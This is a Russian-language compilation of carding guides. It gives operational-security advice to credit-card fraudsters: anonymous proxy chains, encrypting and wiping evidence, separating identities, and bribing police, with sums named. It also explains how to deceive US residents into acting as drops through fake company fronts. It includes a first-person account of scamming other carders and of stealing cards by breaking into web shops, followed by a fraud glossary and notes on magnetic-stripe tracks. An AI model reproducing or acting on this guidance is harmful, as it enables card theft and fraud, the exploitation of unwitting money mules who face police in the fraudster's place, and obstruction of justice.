Но случается так, что дорога приводит не под пальмы, а прямиком в тюремный барак, где небо в клеточку, а роль девочки играешь ты сам. И виной тому не дяди в погонах, которые рано или поздно придут за тобой, а ты, так как вовремя не позаботился о своей безопасности.
Прошвырнувшись по интернету и пообщавшись с толковыми людьми, я подобрал небольшую коллекцию хинтов из серии "как обезопасить себя". Возможно, некоторые из них тебе покажутся банальными, но менее важными они от этого не становятся. Прочти и запомни. И тогда, если повезет, тебе удастся избежать свиданок с ментами.
Чтоб не остаться в дураках, читай внимательно УК
Многие ньюбисы, которые втягиваются в кардинг, настолько загораются идеей сорвать халявный куш, что забывают о правовой стороне своих дел. Ведь все эти скарженные плееры и диски, ноутбуки и нал не с луны падают. Они чьи-то, и ты их не подобрал на улице, а именно украл. А воровство уголовно наказуемо, так даже в УК написано. Этим самым УК будут руководствоваться дяди в погонах, когда придут забрать тебя от мамы с папой в тюрьму. И этот самый УК ты должен выучить как свои пять пальцев, чтобы знать, на сколько времени родители могут лишиться сына, если сынуля наломает дров.
Основные статьи, на которые ты должен обратить внимание, это 159 (мошенничество), 165 (причинение имущественного ущерба путем обмана или злоупотребления доверием), 174 (отмывание денежных средств или иного имущества, приобретенных другими лицами преступным путем), 175 (приобретение или сбыт имущества, заведомо добытого преступным путем), 186 (изготовление или сбыт поддельных денег или ценных бумаг), 187 (изготовление или сбыт поддельных кредитных, либо расчетных карт и иных платежных документов), 272 (неправомерный доступ к компьютерной информации) и 273 (создание, использование и распространение вредоносных программ для ЭВМ). Скачать текст УК ты можешь по адресу http://nalog.akcentplus.ru/kodeksrf/ugol.rar. Вообще, прежде чем лезть "в бой", основательно разузнай и осознай, куда именно ты лезешь. Чтобы после счастливых улыбок от успешно скарженного добра не было слез недоумения, чего это вдруг какие-то злые дяди хотят лишить тебя свободы.
Чем меньше говорить ты будешь, тем меньше вероятность, что себя погубишь
Если, несмотря на все ужасы, описанные в УК, ты все-таки решился на ответственный шаг, запомни простое, но важное правило: "Молчание - золото". Конечно, хочется похвастаться перед кентами своей элитностью и халявным добром. Рассказать Вовану, как круто ты надул узбека из Америки. Но где гарантии, что Вова не скажет Пете, а Петя из зависти - майору милиции Козлову? Не думай, что твой напарник, с которым вы проворачиваете дела уже несколько месяцев и болтаете целыми днями по аське, не заложит тебя, если его прижучат. Во время допросов и обработки ментами он будет думать не о тебе и вашей дружбе, а о своей шкуре и свободе. И даже ближайших родственников, в которых ты полностью уверен, не стоит посвящать в тонкости своей работы. Они могут случайно сболтнуть лишнего, а отсиживать придется тебе.
После вливания в кардерский бизнес твои связи должны разделиться на личные и деловые. Те, с кем ты водишь дружбу и любовь, не должны ничего знать о делах, а те, с кем ты делаешь дела и деньги (другие кардеры), пусть остаются в неведении относительно твоей реальной жизни.
И еще. Если, помимо кардинга, ты юзаешь всякие чаты и любишь покрасоваться на форумах, не сиди везде под одним ником. "Рабочий" ник не должен больше нигде светиться. Бывает, посмотришь, вроде солидный человек, гроза кред и дропов, а введешь никнейм в ya.ru, и на первой же свалившейся паге читаешь объявку пятилетней давности: "Молодой и красивый, познакомлюсь с молодой и красивой", а внизу актуальный телефон.
Прокси - лучшая защита, юзай ее, и ты - элита
Так как большинство кардерских операций сейчас осуществляется через Сеть, то пора подумать, как бы прикрыть свою задницу, блуждая по инету. В этом деле лучшим другом для кардеров являются прокси-серверы. Далеко не каждый прокси обеспечивает полную анонимность. Некоторые из них, хоть и являются посредниками между твоим компом и атакуемой жертвой, настоящего адреса не скрывают. Другие оставляют информацию об использовании прокси. А учитывая то, что не все ресурсы позволяют зайти под проксей, и не все юзвери доверяют ныкающимся за проксями парням - это не есть гуд. Посмотреть, видит ли сервак твою проксю, можно здесь - www.all-nettools.com/pr.htm.
Поэтому наш выбор - анонимные прокси. Они не оставляют никакой лишней информации и хорошо справляются со своей основной функцией - обеспечением анонимности. Большой список анонимных проксей можно найти на kiev-security.org.ua/box/a1/2.shtml, или пошарься по netspy.ukrpack.net. На кардерпланете за 60 ВМ в месяц предлагают купить доступ к сотням быстрых анонимных проксей (или к 500K за 300 зеленых). Если есть лишние деньги, советую воспользоваться этим предложением, так как приватные серваки в любом случае лучше публичных. Проверить прокси-сервер на анонимность можно здесь - www.samair.ru/proxy/proxychecker.
Если ты серьезно задумываешься о своей безопасности, нужно, чтобы у тебя под проксей бегали не только Opera (IE), но и IRC-клиент, фтп-клиент и даже аська. Для удобства работы и настройки советую скачать занятную программу Anonimity4Proxy (http://cr0aker.tiraet.com/cgi-bin/topdl/download.pl?file=128). В ней предусмотрены настройки прокси-соединений через любые порты, возможность автозамены серваков через какое-то время, возможность отключить недоступные из браузера функции, оставляющие следы в Сети, и другие полезные фичи.
Если ты проворачиваешь простенькое дельце, к примеру, пытаешься спионерить mp3-плеер, то одного анонимного прокси будет вполне достаточно. Но если оборот твоего бизнеса составляет десятки тысяч долларов, федералы легко могут запросить информацию с прокси, под которым ты проказничал, и хозяину сервака, хочешь не хочешь, придется заглянуть в логи и отыскать твой реальный IP. Чтобы усложнить задачу людям в черном, нужно создать цепочку прокси-соединений. При этом ты сначала соединяешься с одним прокси-серваком, потом с него заходишь на второй, со второго на третий и затем, через все эти узлы, соединяешься с нужным тебе компом. Связь при этом, мягко говоря, немного ухудшается, но твоя безопасность повышается многократно. Теоретически цепочки из трех проксей достаточно, чтобы тебя не нашли, хотя гарантий никаких нет. Мало ли что ты натворишь, и насколько серьезно за тобой будут охотиться. Для удобной работы с цепочками проксей скачай программу SocksChain (www.ufasoft.com/files/sockschain_setup.exe).
И, конечно же, не забывай про фаервол, который должен быть у тебя на посту 24 часа в сутки и закрывать как можно больше портов. Подобных программ много, я могу посоветовать установить Outpost Firewall, который уже давно отлично себя зарекомендовал. Утягивай его с www.agnitum.com/products/outpost.
Коллег своих не кидай, кинуть себя не позволяй
Несмотря на то, что сам кардинг подразумевает обман других людей (практически всегда буржуев), внутри кардерского сообщества люди, кидающие "своих", вызывают только презрение. Их списки ведутся на кардерпланете на своеобразной доске позора, и называют их либо Дятлами, либо Scum of Society (отбросы общества). Тем не менее, количество их не убывает. Все время находятся особо хитрожопые индивидуумы, которые не заморачиваются принятым в среде этикетом (в сообществе кардеров есть свои правила поведения) и руководствуются только одной целью - срубить побольше бабла. Среди нескольких тысяч читателей форума www.carderplanet.net встречаются десятки подобных кидал. Всех их можно поделить на три категории: новички, любители и профи.
У первых тактика проста как две копейки - они предлагают форумянам товар или сервис, который у них якобы есть, требуют предоплату, а когда получают деньги, попросту прекращают отвечать на мыло/аську. Как правило, парни из этой категории слабо разбираются в вопросах кардинга и на форуме имеют статус ньюбиса (или вообще unregistered). В разговоре отдают предпочтение обсуждению размеров и способа перевода оплаты, а не описанию предоставляемых услуг. Внимательному человеку будет нетрудно определить такого рода кидалу, предварительно пообщавшись с ним некоторое время по аське.
Представители второй категории более подкованы в кидании коллег по ремеслу. Вначале они зарекомендовывают себя на форуме, честно предоставляя клиентам товар, завоевывая доверие остальных кардеров. Но со временем, когда заказы становятся уже более серьезными, качество услуг постепенно сходит на нет. И когда народ перестает верить отмазкам, кидала сматывает удочки и просто исчезает. Правда, только для того, чтобы вскоре снова появиться, но уже под другим ником.
Профессиональные кидалы по способам заработка схожи со своими коллегами из второй категории, но имеют намного больший опыт, а развод форумян - их постоянная и часто единственная работа. Эти парни уже долгое время тусуются в кардерской среде, знают всех инсайдеров и правила, умеют найти подход к каждому, даже самому мнительному клиенту (хотя предпочтение отдают обычно ньюбисам). Из-за хорошей осведомленности профи в кардинге, а также их осторожности, определить в них кидалу нелегко.
Лучшим советом тут будет остерегаться иметь дело с малознакомыми людьми. Форумяне обычно оставляют отзывы о качестве предоставляемых услуг, и прежде чем выходить с человеком на связь, внимательно почитай, что о нем говорят другие. Хорошую защиту от кидал дает гарант-сервис, то есть третья сторона, чей авторитет не подлежит сомнению, и через которую осуществляется сделка. Если человек согласен на такой вариант, это уже о чем-то говорит. Неплохо бы обращать также внимание на статус пользователя. Хотя членство в "verified" не дает стопроцентную гарантию, процент кидал среди них ниже, чем среди каких-нибудь "newbie".
Никогда не спеши высылать деньги. Креды, приватные прокси, полезная информация - это все, конечно, хорошо, но потрудись сначала пообщаться с их продавцом. Всегда старайся договориться об оплате после получения товара или хотя бы об авансовой оплате (вперед платится небольшая часть денег, а если все пройдет нормально, остальные деньги досылаются). Ну, а если уже кинули, сообщи об этом на форуме, чтобы кидала не разбогател на еще большую сумму.
И последнее - не советую тебе самому становиться на этот путь. Гораздо большую пользу ты принесешь себе, если заработаешь уважение среди кардеров, чем если будешь размениваться на мелочевку, кидая ньюбисов. Людей, которые кидают своих, нередко ищут и довольно жестоко наказывают. Если уж хочешь кого-то кинуть, проворачивай свои делишки с буржуями. Они и побогаче, и живут намного дальше.
Ищи только хороших дропов
Как известно, в кардинге очень важную роль играют дропы - подставные лица, через которых ты обналичиваешь украденные деньги или получаешь товар, скарженный в онлайновых магазинах. За свою помощь дроп получает денежное вознаграждение, и, так как все добро сначала приходит на его домашний адрес, именно он будет отвечать перед ментами в случае чего. Хорошего дропа найти не так уж легко. В Америке (а именно там должно проживать подставное лицо) тоже немало жадных, нечестных людей. И шанс, что дроп предпочтет оставить товар себе вместо сомнительного сотрудничества, достаточно велик. Поэтому к поиску и работе с дропами нужно подходить с умом.
В принципе, практически каждый американец с низким или средним достатком является потенциальным дропом. Хороший способ найти людей - аська со своими white pag’ами или форумы, где ищут работу (их в англонете миллион). Если у тебя туго с английским, можешь поискать среди жителей США наших эмигрантов, хотя выгоднее работать именно с коренными буржуями. Навешать лапши русскому - это не то же самое, что задурить америкоса. Чтобы дроп повелся на твое предложение, нужно создать видимость того, что ты представитель солидной развивающейся фирмы, где есть свой штат сотрудников, сайт, фирменные мыльники и подобная ерунда. Стиль писем должен быть соответствующий - официально-деловой, по которому видно, как фирма ценит каждого клиента.
Когда на твое предложение откликнется народ, расскажи заготовленную заранее легенду о том, как вы уже давно и успешно сотрудничаете с западом и перепродаете тамошнюю продукцию. Что тебе нужны люди, готовые получать и пересылать товары, зарабатывая на этом деньги. Или, если тебе нужно обналичить доллары, другую легенду (придумай уж сам). Первое время работы с дропом проверяй его. Не присылай ему дорогих товаров, не проси обналичить крупную сумму. Только когда увидишь, что человек выполняет свою работу честно и без задержек, раскручивай его дальше. Постарайся выведать об этом человеке максимум информации, а также постоянно держи его на связи. Если он будет чувствовать свою востребованность и регулярно получать обещанное вознаграждение, у него и мысли не возникнет тебя кинуть. А чтобы все было вообще замечательно, потрудись соорудить контракт, проставить "фирменные" подписи и печати и выслать факсом. Это создаст иллюзию легальности дела, а когда американская ментура постучится к посреднику в дверь (а это обязательно произойдет через несколько месяцев), у того будет какое-никакое доказательство своей непричастности к инциденту.
Несмотря на то, что работать с непосвященными дропами дешевле и удобнее, иногда имеет смысл воспользоваться услугами профессионалов. Это люди, которые знают, что товар и деньги - грязные. И сознательно берут на себя ответственность за все махинации. Естественно, за немаленький процент (обычно половину суммы). На форуме кардерпланета можно найти людей, которые всегда готовы обналичить деньги или принять товар. Можно воспользоваться также услугами зарубежных контор, которые обналичивают деньги в системе E-Gold (их список можно найти на www.golddirectory.com/e-gold.htm). В любом случае, занимаясь кардингом, всегда действуй через подставных лиц. Нигде и никогда не указывай свой настоящий адрес. Его также не должны знать сами дропы, с которыми ты работаешь, и дополнительные посредники, через которых ты, возможно, контактируешь с дропами. А если у "партнеров" появятся вопросы относительно тебя - смело ври. Причем ври так, чтобы это было невозможно проверить.
Чтоб не ругаться потом матом, сжигай любые компроматы
За время тяжкой работы по зарабатыванию чужих денег у тебя постепенно будет скапливаться полезное добро: номера кред, пароли и прочие радости, которые ты будешь называть "своим сокровищем". Для людей в серых шинелях эти же вещи проходят под названием "улики". И об этих самых уликах тебе нужно позаботиться загодя.
Во-первых, если у тебя не стоит PGP, скачай эту нужную программу с сайта www.pgp.com и закриптуй свой винт так, чтобы самому страшно от такой защиты стало.
Во-вторых, отучи себя от вредной привычки записывать деловую информацию на огрызках бумаги и бросать их где попало. Если придут менты и найдут под диваном обрывок бумажки с давно заюзанными кредами, тебе останется только кусать локти и смотреть, как эта шпаргалка гробит твою жизнь. Никакой компрометирующей информации не должно быть ни на мобиле, ни на КПК, ни на дискетах, заныканных глубоко в очке. Все на компе, все в зашифрованном виде. А если нужно срочно удалить особо компрометирующее файло, юзай программу Kremlin (www.kremlinencrypt.com), которая стирает так, что никакой uneraser не поможет.
Матерые кардеры рекомендуют также использовать виртуальный писюк. Вкратце это программа, которая создает на винте образ нового компьютера, и работать с ним можно, как если бы к тебе по сетке была подключена другая машина. Вначале "винчестер" эмулируемой тачки девственно чист, и на него можно установить любую ОС, любые программы. У VirtualPC есть одна очень полезная фича, которая вносит эту вещь в разряд "must have" для каждого уважающего себя кардера. На виртуальном компе можно запускать любые приложения, серфить по любым сетевым джунглям и вообще творить что угодно. Все это временно будет сохраняться на фейк-винте, но достаточно завершить сеанс, клацнуть "отказ от сохранения", и вся информация о твоих последних перемещениях будет удалена. Виртуальный комп примет тот вид, который имел во время включения. Скачать это чудо можно с www.microsoft.com/windowsxp/virtualpc.
Попал к ментам - не обессудь, а денежку для них добудь
Несмотря на всю немереную анонимность, которой ты себя окружил, стопроцентных гарантий, что ты не попадешь в лапы ментов, тебе не даст никто. И уж если настал роковой миг, когда в дверь тарабанят с грозным воплем: "Откройте, милиция!", не паникуй, переходи к плану Б. На тему общения с ментами написано до фига статей, например, неплохую подборку материалов можно найти на www.prison.org. Главное, что ты должен запомнить, менты - это лживые, заискивающие и хитрые существа. И не друзья они тебе, а враги заклятые. Они будут сулить тебе свободу в обмен на чистосердечное признание, убеждать, что чем больше скажешь, тем меньше отсидишь. Но ты не ведись, на самом деле все с точностью наоборот. Ты им по фигу, им нормативы надо выполнить, посадить аккурат столько рож, за сколько премию дают. Так что держись мужественно и на все вопросы следователя отвечай: "Дяденька, вы что, да я даже терминов таких не знаю". Чем больше ты скажешь, чем больше подпишешь, тем ярче и длиннее будет твоя жизнь на зоне. Лучше промолчать и три дня отоспаться в обезьяннике, чем поговорить по душам с "добрым" опером и потом 3 года хлебать баланду.
Кстати, ты в курсе, что менты, хоть все из себя и неподкупные, но кушать тоже хотят. И вряд ли откажутся, если ты сделаешь финансовый вклад в фонд развития их семей. А за это они по дружбе закроют твое дело и отпустят с миром. На лапу давать лучше всего сразу, потому что когда дело дойдет до прокуратуры, отмазаться будет намного сложнее (или дороже). Тарифы варьируются от 200 до 2 тысяч баксов, в зависимости от тяжести твоего проступка, качества компромата на тебя и жадности ментов. В среднем баксов 500, думаю, должно хватить. Если прикинешься вечноголодным студентом, можно сторговаться и подешевле. Договориться практически всегда можно. Менты в этом плане люди понимающие.
Но мой тебе совет, не доводи до этого. Разговор с операми - не самое приятное занятие. Имей голову на плечах, умей ей пользоваться и всегда будь чуточку параноиком. Где-где, а в кардинге это качество никогда не помешает.
Путь кардера
Начинающим кардерам посвящается
Для новичка в деле кардинга есть два начальных пути, которые во многом определяют его дальнейший авторитет и развитие:
1. Путь риппера – самый простой по началу - путь кидания «честных кардеров» на карты или вмз. Сразу определяет негативное отношение к самой особе кидалы.
2. Путь «честного кардера» - путь требующий достаточных знаний в области хака и социальной инженерии. Как человек прошедший оба эти пути хочу описать каждый из них
достаточно подробно, рассмотрев все их плюсы и минусы.
Путь риппера
Рипперами обычно становятся неопытные, и мало знакомые с самим кардингом, как таковым молодые люди (большинство просто дети). Малолетнего неопытного кидалу легко опознать по новозареганному 9- тизнаку, и определенно по его детской речи. Но также существуют в сети несколько экземпляров профессиональных, хорошо организованных рипперов, к примеру известный на многих кардерских порталах человек под ником BAO (этого скорее можно отнести в раздел ОЧЕНЬ хорошо организованных рипперов, нежели к професиональным). Основным инструментом кидалы является социальная инженерия – 100% проверено
что от хитрого и бывалого кидалы не спасают никакие меры, включая даже гарантов.
Первые шаги
Первое, чем я занялся когда решил попробовать себя но поприще рипперства (надо сказать к тому времени я уже был достаточно неплохим синжером) это продажа обычных карт с cvv кодом. Для этого я нашел на одном из форумов продавца карт и сделал ему «суперпредложение», сказав ему что хочу купить 7000 карт usa с cvv. Разумеется ни один
продавец не отказался бы от такого заказа (взыграла одна из главных ниточек управления синжера - жадность), и сказал что готов продать мне их. Я для порядка поломался немного, сбил немного цену и попросил у него 100 штук на проверку, убедив его что я буду постоянным и выгодным покупателем. Получив свои 100 халявных карт ушел в оффлайн и сменил аську (на asechka.ru продаются обычные 6-тизнаки по 1 вмз за штуку).
Легкие деньги
Вторым серьезным желанием стало желание обогатиться =). Т.к. честно стыренных карт было уже достаточно много (~600 шт.), я решил разводить людей уже на деньги. Это оказалось несложно, я предлагал людям купить огромные базы за смешные деньги (первая сделка была - 3000 карт за 180 вмз, при минимальной «рыночной» цене – 1.5 вмз за штуку) и предлагал на проверку те карты, добытые на халяву. Таким образом я срубил около 600$ за 2 месяца.
Эволюция
Потом простые карты с cvv кодом уже перестали меня интересовать, т.к. были дешевы и не приносили особой прибыли. Следующей ступенью была продаж карт с full info и enroll. Тут я заработал еще около 200$, но дело как-то не шло, и я решил заняться чем-нибудь другим – более прибыльным. Я решил «продавать» карженую технику. Знаете сайт carderproduct.org? Вот это и есть самые настоящие кидалы. Я работал более скромно но все же неплохо рубил бабла на этом. Особенно хорошо расходились телефоны nokia 6600 и нубуки =). Тут существует много способов развести человека, но для всех них нужно иметь неплохой опыт в синженерии. Важно представить себя как серьезного продавца и показать что ты не собираешься идти на уступки и доказать покупателю что это в его интересах чтобы ты с ним работал. Можно наоборот показаться глупым ламером и делать очень много уступок, а потом когда человек расслабиться незаметно предложить ему свою незначительную с виду идею, которая тем не менее позволит провернуть твой грязный замысел =).
Заключение.
Малолетние рипперы – жалкие, презренные люди, достойные только сожаления, готовые за 5 баксов из тебя душу вытрясти своими неумелыми попытками тебя кинуть. Рипперы профессиональные лично мне внушают только уважение, как отличные синжеры (хотя надо сказать этому таланту можно было бы найти и лучшее применение).
Плюсы:
- ненужно много ума
- достаточно безопасно
- можно заработать неплохие деньги (200 – 300$ в месяц)
Минусы:
- отрицательное отношение со стороны нормальных кардеров
Пост скриптум
В период работы с енроллом я понял что на нем можно неплохо заработать никого не кидая и, найдя дропа, начал его налить.
Путь кардера.
Про это написано уже много статей, так что я не буду повторять их а просто напишу кое-что упущенное в них, либо исправлю морально устаревшие ошибки этих статей. Для человека решившего стать нормальным кардером необходимо иметь неплохую базу в плане хакинга. Во многих старых статьях «для начинающих кардеров» писали о взломе инет-шопов через Гугл, юзая примитивные багги php/perl inlude. Сейчас такое уже не проходит, или проходит тока с самыми захиревшими шопами в которых вряд ли есть что нибудь полезное. Можно для начала посоветовать где-нибудь достать (купить) базу хостера – там наверняка есть парочка шопов. В конце концов можно просто просканить сервак шопа на предмет уязвимых сервисов и ломануть его каким-нибудь публичным или приватным эксплойтом. Так можно достать карты. Далее их можно продавать, что дает небольшой но стабильный доход, а главное – это достаточно безопасно. Далее можно использовать карты для закупки в инет шопах
(разумеется заказывать не на себя – для этого есть дропы). Если у тебя появиться карты с full info, то их можно использовать для онлайн доступа (заенроллить) и управлять счетом кардхолдера через инет; возможно осуществлять операции перевода на другие счета и т.п., но это чревато прозвоном из банка, который требует во-первых неплохого знания английского, а во-вторых опять навыка синженерии. Можно заказать себе так называемый «белый пластик» и пойти шопиться в реальных магазах.
Плюсы:
- можно заработать очень много денег
- можно продуктивно сотрудничать с другими кардерами
Минусы:
- достаточно небезопасно
- новичку изначально нужны неплохие знания в области хакинга
Заключение
Я не призываю народ заниматься кардингом. Эта статья написано исключительно для ознакомления и обезопасивания себя, а также просто как публицистический рассказ =).
Краткий кардерско-русский словарь
CC, картон, карты – кредитные карты или информация о них.
Фрауд (fraud) – незаконная операция. Со всеми вытекающими отсюда последствиями.
Кардхолдер (cardholder) – владелец карты
CVV/CVV2/CVN код – три-четыре цифры, улучшающие защиту карт при оплате через интернет. Теперь карты без этого кода практически нигде не принимаются.
Чекать карты (проверять на валидность) – проверка кредитных карт на работоспособность. Кредой могли воспользоваться до тебя, из-за чего кардхолдер мог ее заблокировать и, следовательно, сделать по ней уже ничего нельзя. Поэтому креды стоит брать у проверенных продавцов или где-то проверять. Проверка обычно заключается в съеме с карты минимально возможной суммы (около 10 центов). Если снять удалось, значит, креда рабочая, и ее надо срочно куда-нибудь вбивать. Проверять лучше через спецпрограммы или в специальных местах. На порносайтах чекать не советую, так как именно там они и убиваются.
Вбивальщик – человек, который знает, как правильно купить товар в е-магазине или аккаунт на порносайте, так чтобы при этом не появилось сообщение transaction declined.
Вещевой кардинг – одна из разновидностей кардинга, заключается в покупке реальных вещей по украденной креде. Обычно это бытовая техника, так как потом ее можно продать. А продавать надо, потому что, во-первых, ее очень сложно ввезти в Россию, а во-вторых – никому не нужны дома вещественные доказательства. Продажей может заниматься,
например, иностранный дроп.
Дроп (от англ. drop – бросать) – человек, на которого «скидываются» наличные, чеки или товары, заказанные в магазине, которые он потом передает своему нанимателю. Дроп может и не знать, что приобретено все не совсем честным способом. Или наоборот, заниматься этим
профессионально.
Вайер (wire transfer) – банковский перевод. Идет долго, но надежно. Весьма вероятен и чарджбэк, если деньги краденые. Чарджбэк (money back) – отзыв денег. Делают интернет-магазины, банки, электронные системы платежей. Производится, когда жертва кардинга
заявляет, что ее обокрали. Поэтому в кардинге большое значение придается отмыву и обналичке денег.
Money orders или Cashier Checks – чеки, которые заранее оплачены. Из всех видов чеков эти - самые удобные для кардеров. С остальными приходится долго возиться: посылать их на проверку в другой банк и заполнять кучу бумаг. А эти чеки не требуют такого напряжения, правда и комиссионный процент у них очень неслабый.
Транзакция – операция по карте, начинающаяся с идентификации кардхолдера и до момента выдачи денег.
Палка – PayPal, система электронных платежей (типа наших WebMoney). Существенное отличие в том, что туда можно переводить деньги с креды. Правда, делать это становится все труднее и труднее - организуются лимиты ввода, лимиты вывода и еще много разных ограничений.
Нальщик – человек, который помогает перевести деньги в наличность. Допустим, к тебе пришел чек. Отдаешь его нальщику – получаешь наличность. Нальщики не налят креды! В основном они работают с чеками, банковскими вайерами, денежными переводами.
Эскроу-сервисы (escrow services) – конторы, которые играют роль гарантов при работе с аукционами. Ты им отсылаешь деньги, ЭС сообщает продавцу, что деньги есть, и он (продавец) отсылает товар. Получив его, ты сообщаешь об этом, и деньги уходят продавцу.
Белый пластик – это не пластик от элитных производителей, как мне однажды заявил «гуру» кардинга, а просто белый кусок пластика (обычно марки CR-80) с пустой магнитной полосой. Похож на CD-болванку, и на него тоже можно записать много интересного wink.gif.
Дамп – информация, записанная на магнитной полосе кредитной карты. Обычно состоит из 2 или 3 треков.
Трек (дорожка) – кусок информации, записанный на карте. Всего на карте их 3. Первый – инфа о владельце, второй – инфа о владельце, о банке и др., третий – запасной или для дополнительной информации. Самый важный - это второй трек. Третий нам не интересен, так как ничего ценного собой не представляет.
Эмитент пластиковой карты (card issuer) – контора, которая выдала карту. Это может быть банк, магазин (дисконтная карта) и др. Мы будем говорить о банковских кредитных картах, поэтому в качестве эмитентов будем рассматривать банки.
BIN (Bank Identification Number) – первые несколько цифр номера карты, которые указывают на банк-эмитент. Обычно это первые шесть цифр. Если банк очень крупный, достаточно и первых трех цифр. Банк-эквайер (acquirer) – банк, отвечающий за первичную обработку
тразакций. То есть, сначала он работает с твоей кредиткой, магазинами, в которых ты отовариваешься, банкоматами, в которых ты получаешь деньги. Именно он распространяет стоп-листы.
Авторизация – процесс проверки наличия средств на счете у клиента.
Мерчант аккаунт (merchant account) – специальный счет в банке, который открывается продавцом, чтобы снимать деньги с карт-счетов. Например, решил ты принимать оплату кредитными картами. В банке открываешь такой счет, и на него поступают деньги от покупателей. Чтобы тебе не ждать, пока перейдут деньги с карт-счета, банк платит тебе
из своего кармана, а сам ждет тех денег. Поэтому, чтобы открыть такой счет, нужно просто излучать уверенность, что твой ларек завтра не обанкротится.
Эмбоссер – аппарат, который выдавливает инфу на картах. Обращал внимание, что на кредитках буквы не нарисованы, а как бы выдавлены? Этим и занимается эмбоссер.
Энкодер (ридер) – девайс для чтения и записи инфы с магнитной полосы кредитки.
ATM (Automatic Teller Machine) – банкомат.
Импринтер – устройство, которое печатает на слипе данные, эмбоссированные на карте, и данные о точке, на которой расположен импринтер.
ПОС-терминал (point-of-sale terminal) – устройство, установленное в магазинах. Считывает инфу, записанную на магнитной полосе, и связывается с банком для проведения транзакции. В отличие от банкомата, ПОС-терминал управляется кассиром. В большинстве случаев
идентификация покупателя является визуальной, то есть кассир не спрашивает пин-код или удостоверение личности. Это не касается нескольких видов карт, требующих полной авторизации и идентификации при использовании.
Рассматриваем креду со всех сторон
Кредитки уже давно вошли в нашу повседневную жизнь окончательно и бесповоротно. Многие с их появлением почти забыли про наличные. Конечно, на это повлияло множество сопутствующих факторов: практичность, удобство, распространенность и относительная безопасность.
Но сегодня мы рассмотрим креды не с привычной – электронной - стороны, а с несколько другой – что это за кусок пластика и каким образом он работает.
История
Самые первые кредитки появились около ста лет назад (в США – где же еще), тогда они использовались исключительно в магазинах, ресторанах и отелях для обслуживания респектабельных постоянных клиентов, и ни о каком серийном производстве не было и речи. Карточки, по сути, пришли на смену оплаты в рассрочку. В те далекие времена креды были сделаны из толстого картона, затем появились металлические карточки (уже эмбоссированные), и только потом, после длительных экспериментов с различными пластмассами, появились пластиковые карты.
Первой фирмой, занимающейся серийным выпуском кредиток (для ресторанного бизнеса) стала Dinners Club (с 1949 года). Тогда впервые фирма-производитель кред работала посредником между покупателем и продавцом. Также Dinners Club попыталась создать универсальную карту (между прочим - фирма жива до сих пор). Затем производством кред занялась American Express (крупнейший производитель дорожных чеков), Bank of America и Chase Manhattan Bank (два крупнейших банка страны). В 1966 году Bank Of America совершил серьезный прорыв, позволив другим банкам проводить операции с их фирменными кредитками BankAmericard. За короткий срок эта платежная система получила национальный масштаб, затем в стране организовалась вторая подобная система - Interbank Cards Association.
В скором времени пластиковые карты стали международным стандартом, количество пользователей измерялось десятками миллионов. В 1976 году Americard сменила имя на Visa (для выхода на мировую арену), а в 1980 году MasterCharge – на MasterCard. За несколько лет эти платежные системы стали крупнейшими в мире (в банковской среде) и не собираются сдавать позиции. Кстати, эти две системы долгое время противостояли друг другу, запрещали банкам одновременно выдавать обе карты, но это было раньше. Совершенствование кред продолжается до сих пор, следующим этапом эволюции планируется практически полный переход на смарт-карты, что добавит множество плюсов (в первую очередь – серьезную защиту, построенную на криптографических алгоритмах), но об этом я расскажу ниже.
Стандарт
Введение мирового стандарта послужило решающим фактором для всеобщего признания. На сегодня существуют кредитки только одного стандарта – ID-1, другие просто (пока или уже) не используются. Этот стандарт определяет все до сотой доли миллиметра, каждый элемент креды должен находиться точно на своем месте и в полной мере выполнять возложенную на него функцию. Естественно, по этому мировому стандарту и производится абсолютно все обслуживающее оборудование (импринтеры, электронные терминалы, банкоматы). Производителям пластиковых карточек позволено только экспериментировать с дизайном карточек, да и то в очень строгих рамках.
Все кредитки можно разделить на несколько классов:
Чиповые карты (смарт-карты) – кредитки со встроенной микросхемой или памятью (чипом).
Эмбоссированные карты – кредитки, часть текста на которых печатается методом тиснения или термопечати. Эмбоссированный текст необходим для печати оттисков на чеках, но такое используется в основном в США и для визуального распознавания текста.
Магнитные карты – креды с магнитной полосой.
Такое разделение крайне условно, так как в большинстве кред эти характеристики сочетаются (иногда одновременно все три).
Кредитка состоит из нескольких отдельных функциональных элементов, о которых я ниже расскажу подробнее: кусок пластика (с эмбоссированным текстом), магнитная полоса, микросхема или память (чип) и некоторые другие менее значимые элементы.
Основа
Сама карточка сделана из куска особого пластика размером 85,6х53,98х0,76 мм. Пластик производится по сложной технологии, окрашивается, на заготовку наносятся обязательные общие данные про эмитент и платежную ассоциацию, а также - памятка владельцу, контактная инфа производителя и фотография владельца. После этого креда ламинируется, затем (по необходимости) на ней эмбоссируются или выжигаются лазером необходимые идентификационные данные (номер карты, имя владельца, срок действия), встраивается чип или магнитная полоса. При производстве особое внимание уделяется безопасности во время персонализации карточки (нанесение идентификационных данных владельца и прошивка памяти микросхемы (энкодинг)). Также все этапы производства креды находятся под пристальным контролем качества - брак должен моментально отсеиваться, а карта должна удовлетворять множеству международных требований, в том числе - выдерживать нагрев до определенных температур, сопротивляться определенным механическим воздействиям и многое другое (все по тому же стандарту).
Магнитная полоса
Магнитная полоса располагается на реверсе креды, в верхней части, недалеко от верхнего края. Внешне она ничего интересного собой не представляет – черная или коричневая полоса во всю длину карты. Полоса состоит из нескольких магнитных дорожек (чаще всего – 3). Ширина ее составляет от 10,1 до 10,3 мм (если на креде 3 дорожки). Каждая дорожка отвечает за хранение своей собственной информации, при этом на каждой дорожке могут располагаться максимум 107 символов (цифровых или буквенных).
1 дорожка содержит основную инфу: идентификационный номер, общую информацию о владельце, сведения про эмитент, срок действия карты и немного служебной информации.
2 дорожка отвечает за авторизацию карточки (полностью определяет, какие операции и на какую сумму ты можешь производить с кредой), а также дублирует часть инфы с первой дорожки.
3 дорожка используется в основном при работе с банкоматом (иногда ее может и не быть – тогда магнитная полоса будет уже). Первые две дорожки только для чтения, третья – также и для записи (на ней, например, банкомат делает отметки о снятии денег). Для защиты магнитной полосы от подделок существуют специальные проверочные коды CVV (Card Verification Value) для Visa и CVC (Card Verification Code) для Europay, но копированию полосы они противостоять не могут.
Чип
Чип – самый высокотехнологичный элемент креды, и, естественно, этот вид карт стал применяться сравнительно недавно. Можно с уверенностью сказать, что за смарт-картами будущее (вернее, уже и настоящее).
